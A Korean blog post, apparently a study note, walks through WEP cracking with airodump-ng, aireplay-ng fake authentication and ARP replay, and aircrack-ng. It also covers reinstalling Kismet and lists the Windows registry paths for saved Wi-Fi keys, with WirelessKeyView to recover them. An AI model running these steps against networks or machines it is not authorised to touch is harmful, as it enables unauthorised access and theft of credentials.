예전에 WEP Key를 크랙했을 때의 자료를 정리해 올려본다.
WEP Key가 깨진것은 쫌 오래된 일이다. 이젠 그리 놀랍지도 않지만, 요즘 무선랜을 공부하는 중에 자료가 있어 정리해 본다.

WEP Key 크랙에 필요한 툴들은 backtrack에 다 있다.
무선 랜카드를 구하는게 문제다.

무선랜카드: Linksys WUSB54G v4 (chipset:Ralink rt2570)

#>airodump-ng –w [save_file_name] rausb0 --channel 1

[airodump-ng 옵션]

-c(--channel): 무선 네트워크의 채널

--bssid: 공격하고자 하는 AP MAC 주소

-w: IVs들이 담길 파일 이름

rausb0: 인터페이스 이름

 

 


#>aireplay-ng -1 0 –e [ESSID] –a [AP_MAC_addresss(BSSID)] –h [MY_MAC_address] rausb0

위와 같이 페이크 인증을 해야 한다. 페이크 인증이 되지 않으면 packet injection이 되지 않아 IVs패킷을 모으는게 힘들어 진다.

[aireplay-ng 옵션]

-1: fake authentication

0: 초당 재연결 시간

-e: ESSID

-a: AP MAC 주소

-h: 자신의 랜카드 MAC 주소

Rausb0: 인터페이스 이름

-3: arpreplay 모드

-b: 공격할 AP MAC


#>aireplay-ng -3 –b [AP_MAC_address(BSSID)] –h [MY_MAC_address] rausb0

--> 패킷의 량을 증폭시킨다. 아래화면을 보면 갑자기 패킷량이 증가함을 알 수 있다.

 이 방법은 ARP Request를 네트워크에 재주입 시키는 것이다. 이러면 AP는 ARP Request 패킷을 받아 새로운 IV를 생성하여 반출시킨다. 이 방법이 없었던 과거에는 IVs패킷을 모으는데 상당한 시간이 걸렸다.

 

 #>aircrack-ng –s [save_file_name.cap]
--> 획득한 패킷을 크랙한다.

 WEP Key Cracking에서는 IVs값을 얼마나 많이 모으느냐가 중요하다.
보통 128bit WEP Key를 크랙하기 위해서는 40,000~85,000개의 IVs값이 필요하다.



Backtrack4에는 기본적으로 kismet이 설치되어 있다.
그러나....
디폴트로 설치되어 있는 프로그램은 이상하게 실행이 잘 되지 않는다. ㅠㅠ(나만 그런가?ㅡㅡa)
kismet_server가 실행되지 않아 이래 저래 연구해보다 결국 그냥 다시 설치해 버렸다.

kismet싸이트에서 Kismet-2010-07-R1 버전을 다운 받는다.

설치는 매우 간단하다.
#>tar zxvf Kismet-2010-07-R1
#>./configure --prefix=/usr/local/kismet2010
#>make
#>make install

이런 후 그냥 실행하면 실행이 안될 것이다.
kismet.conf를 수정해 주어야 한다.

#>vi kismet.conf
nosource=mon0
-->자신의 무선랜카드 이름으로 설정해 주어야 한다. 2009 이전 버전에서는 source였던 것으로 기억한다.

#kismet2010/bin/>./kismet

아무리 봐도 참 잘 만든 툴 같다.^^

일반적으로 암호설정이 되어 있는 AP에 접속을 하려면 키값을 입력한다.
하지만 한번 입력된 키값은 한번만 입력하면 그 후로는 키 재 입력 없이 바로 접속이 가능하다.
그렇다면 당연히 PC어딘가에 키값이 저장되어 있을 것이다.

다음은 무선네트워크 키 값이 저장되어 있는 레지스트리 위치와 이 값을 불러 오는 프로그램이다.

[Window XP]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WZCSVC\Parameters\Interfaces\[Interface Guid]

[Vista]
\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\[Interface Guid]

위 화면은 xp 레지스트리에 저장되어 있는 키값들이다.(암호화 되어 있는 원래 키값을 알 수가 없다.)


다음은 WirelessKeyView라는 프로그램을 통해 레지스트리에 있는 키 값을 가져온 화면이다.

WEP 키는 hex 또는 ascii값으로 복호화 되어 나타난다.

쓸만한 툴인듯 하다.^^


+ Recent posts